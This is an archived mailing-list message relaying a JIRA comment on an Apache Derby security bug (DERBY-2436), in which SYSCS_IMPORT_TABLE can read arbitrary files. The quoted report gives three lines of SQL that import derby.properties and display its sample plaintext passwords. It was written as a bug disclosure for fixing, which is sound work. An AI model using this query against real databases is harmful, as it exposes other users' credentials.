db-derby-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Rick Hillegas (JIRA)" <j...@apache.org>
Subject [jira] Commented: (DERBY-2436) SYSCS_IMPORT_TABLE can be used to read derby files
Date Thu, 28 Jun 2007 14:10:25 GMT

    [ https://issues.apache.org/jira/browse/DERBY-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12508836
] 

Rick Hillegas commented on DERBY-2436:
--------------------------------------

I think that this is a serious security hole. It is paired with the related problem that you
can use EXPORT and BACKUP to trash derby.properties and data files--and even non-Derby files
depending on the privileges granted to the account which boots the server. It may be comforting
that these attacks can be limited to database owners.

I think we still have a long way to go in shoring up Derby's security mechanisms. For instance,
even allowing customers to store passwords in plaintext in derby.properties seems to me to
be a bit goofy. I would not single out this jira as the blocker which makes Derby intolerably
unsafe.

> SYSCS_IMPORT_TABLE can be used to read derby files
> --------------------------------------------------
>
>                 Key: DERBY-2436
>                 URL: https://issues.apache.org/jira/browse/DERBY-2436
>             Project: Derby
>          Issue Type: Bug
>          Components: Security
>    Affects Versions: 10.1.2.1, 10.2.1.6, 10.3.1.0
>            Reporter: Daniel John Debrunner
>            Priority: Critical
>
> There are no controls over which files SYSCS_IMPORT_TABLE can read, thus allowing any
user that has permission to execute the procedure to try and access information that they
have no permissions to do so. E.g. even with the secure-by-default network server I can execute
three lines of SQL to view to contents of derby.properties, thus seeing passwords of other
users, or the address of the ldap server.
> create table t (c varchar(32000));
> CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL, 'ISO8859_1',
0);
> ij> select * from T;
> C
> ----------------------------------------------
> derby.connection.requireAuthentication=true
> derby.authentication.provider=BUILTIN
> derby.user.SA=sapwd
> derby.user.MARY=marypwd
> Also a similar trick could be attempted against the actual data files, allowing a user
to attempt to bypass grant/revoke security, especially no that binary data can be exported/imported.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.


Mime
View raw message